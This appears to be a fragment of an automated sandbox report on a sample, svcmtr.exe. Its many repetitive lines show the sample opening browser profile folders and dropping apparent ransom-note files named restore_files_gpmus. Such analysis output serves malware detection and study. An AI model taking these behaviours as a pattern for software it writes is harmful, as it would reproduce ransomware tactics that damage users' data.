Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\blob_storage\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\BrowserMetrics\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\TLSDeprecationConfig\4\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe Browsing\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\2986\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GrShaderCache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GrShaderCache\GPUCache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\BudgetDatabase\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\0.57.44.2492\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ECSerivceProvidersConfig\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\Encryption\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\1.0.6.0\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\TLSDeprecationConfig\4\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\61\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\InterventionPolicyDatabase\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\chrome_shutdown_ms.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7xwghk55.default\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\_metadata\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Storage\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PepperFlash\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\wasm\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\8167\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\BudgetDatabase\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\BrowserMetrics\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\blob_storage\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\1.0.6.0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\GrShaderCache\GPUCache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\BudgetDatabase\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\js\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\0.57.44.2492\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\BrowserMetrics\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GCM Store\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\js\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\0.57.44.2492\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\LevelDB\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OnDeviceHeadSuggestModel\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\1.0.0.14\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FontLookupTableCache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\LevelDB\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\js\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SafetyTips\2986\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\61\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\AutofillStrikeDatabase\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\7\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateRevocation\8167\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.47.0\LICENSE.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCache\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.jsJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\7\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OnDeviceHeadSuggestModel\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\BrowserMetrics\restore_files_gpmus.htmlJump to behavior
